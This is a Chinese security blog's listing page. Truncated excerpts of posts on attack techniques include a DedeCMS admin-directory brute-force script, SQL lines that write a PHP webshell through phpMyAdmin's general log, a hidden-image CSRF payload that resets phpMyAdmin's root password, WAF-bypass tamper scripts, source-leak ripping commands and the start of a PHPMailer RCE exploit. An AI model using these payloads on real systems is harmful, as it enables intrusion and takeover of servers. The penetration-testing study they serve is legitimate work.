WIN服务器爆破DEDECMS后台目录

   
分类:安全 | 2018-09-27 | 撸过 613 次
1人扯蛋

利用脚本python

#!/usr/bin/env python
'''/*
* author = Mochazz
* team = 红日安全团队
* env = pyton3
*
*/
'''
import requests
import itertools
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
back_dir = ""
flag = 0
url = "http://192.168.1.9/tags.php"
data = {
"_FILES[mochazz][tmp_name[......]

继续阅读

kali2018.2源

   
分类:安全 | 2018-07-21 | 撸过 2,279 次
0人扯蛋

一、更新

#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-[......]

继续阅读

三个sql语句拿下phpmyadmin的shell

   
分类:安全 | 2018-06-17 | 撸过 2,236 次
0人扯蛋

三个sql语句拿下phpmyadmin的shell

首先要知道路径

一句一句的执行

---------------------------------------------------------
set global general_log='on';
---------------------------------------------------------
SET global general_log_file='D:/webshell/www/cmd.php';
---------------------------------------------[......]

继续阅读

phpMyAdmin 4.7.x CSRF 漏洞利用

   
分类:安全 | 2018-06-15 | 撸过 1,139 次
0人扯蛋

修改root密码:

保存为:webshell.html

<p>Hello World</p>
<img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.webshell.cc%27)" style="display:none;" />

密码为:www.webshell.cc

写文件

首先你要知道路径

保存为:webshell.html
[......]

继续阅读

Linux下暴力破解工具Hydra详解

   
分类:安全 | 2017-03-16 | 撸过 7,383 次
0人扯蛋

Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.

Hydra was tested to compile on Linux, Windows/Cy[......]

继续阅读

phpmyadmin新姿势getshell

   
分类:安全 | 2017-03-15 | 撸过 11,741 次
7人扯蛋

旁白:在一个有WAF、并且mysql中的Into outfile禁用的情况下,我该如何getshell?
首先环境如下:

  • OS:Windows 2003
  • WAF:Safe Dog 4.0正式版
  • phpmyadmin:4.7(许多都可以)
  • Mysql:5.5+
  • PHP:5.3
  • Apache:2.x

目前

into outfile

已经被禁用,并且WAF也会在写入文件的时候拦截。
那么我们尝试通过一个脑洞大开的方法去getshell。

(必须是mysql root权限)

登录phpmyadmin后,查看全局变量:
找到

general[......]

继续阅读

使用sqlmap中tamper脚本绕过waf

   
分类:安全 | 2017-03-9 | 撸过 3,688 次
0人扯蛋

0x00 背景

sqlmap中的tamper脚本来对目标进行更高效的攻击。

由于乌云知识库少了sqlmap-tamper 收集一下,方便学习。 根据sqlmap中的tamper脚本可以学习过绕过一些技巧。 我收集在找相关的案例作为可分析什么环境使用什么tamper脚本。 小学生毕业的我,着能偷偷说一下多做一些收集对吸收知识很快。

0x01 start

脚本名:apostrophemask.py

作用:用utf8代替引号

Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

Tested[......]

继续阅读

常见Web源码泄露总结

   
分类:安全 | 2017-02-13 | 撸过 4,412 次
0人扯蛋

背景

本文主要是记录一下常见的源码泄漏问题,这些经常在web渗透测试以及CTF中出现。

 

.hg源码泄漏

漏洞成因:

hg init的时候会生成.hg

e.g.http://www.example.com/.hg/

漏洞利用:

工具: dvcs-ripper

rip-hg.pl -v -u http://www.example.com/.hg/

.git源码泄漏

漏洞成因:

在运行git init初始化代码库的时候,会在当前目录下面产生一个.git的隐藏文件,用来记录代码的变更记录等等。在发布代码的时候,把.git这个目录没有删除,直接发布了[......]

继续阅读

PentestBox简明使用教程

   
分类:安全 | 2017-02-4 | 撸过 9,255 次
0人扯蛋

0x01介绍

PentestBox:渗透测试盒子 顾名思义,这是一个渗透工具包,但是不同于绝大多数国内xx工具包的是,这里集成的大都是Linux下的工具,Kali Linux上面的常用的很多工具这里面也都集成了。

PentestBox官网:https://pentestbox.org/zh/

官方的介绍如下:

PentestBox是一款Windows平台下预配置的便携式开源渗透测试环境

为什么又有一个渗透测试环境?

PentestBox不同于运行在虚拟机或者双启动环境的Linux渗透测试发行版。

它打包了所有的安全工具,并且可以在Windows系统中原生地[......]

继续阅读

PHPMailer < 5.2.18 - Remote Code Execution (PHP)

   
分类:安全 | 2017-01-13 | 撸过 1,810 次
0人扯蛋

<?php
/*
PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
Discovered/Coded by:
Dawid Golunski (@dawid_golunski)
https://legalhackers.com
Full Advisory URL:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
A simple PoC (working on[......]

继续阅读